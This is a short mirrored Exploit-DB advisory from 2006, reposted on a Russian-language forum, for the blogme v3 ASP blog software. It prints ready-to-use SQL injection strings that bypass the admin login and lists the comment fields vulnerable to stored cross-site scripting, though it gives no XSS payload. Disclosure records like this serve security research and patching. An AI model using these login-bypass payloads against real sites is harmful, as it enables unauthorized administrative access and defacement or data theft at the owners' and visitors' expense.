- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2781
- Проверка EDB
-
- Пройдено
- Автор
- SECURITY ACCESS POINT
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2006-5976 cve-2006-5975
- Дата публикации
- 2006-11-14
Код:
blogme v3 [admin login bypass & xss (post)]
vendor site:http://www.drumster.net/
product:blogme v3
bug:login bypass & xss (post)
risk:high
admin login bypass :
user : ' or '1' = '1
passwd: 1'='1' ro '
xss post :
in: /comments.asp?blog=85
vulnerables fields:
- Name
- URL
- Comments
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: [email protected]
# milw0rm.com [2006-11-14]- Источник
- www.exploit-db.com
